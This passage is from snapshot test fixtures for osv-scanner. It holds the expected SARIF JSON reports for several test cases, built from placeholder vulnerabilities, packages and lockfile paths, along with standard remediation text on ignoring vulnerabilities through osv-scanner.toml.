} }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = 
\"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## 
Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { 
"annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | 
author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## 
[OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" 
} }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = 
\"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## 
Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", 
"locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@123abc' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abcxyz' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@123abc' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxyz |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | 
author1/mine1 | 123abc |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxyz |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## 
[OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" 
} }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = 
\"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this 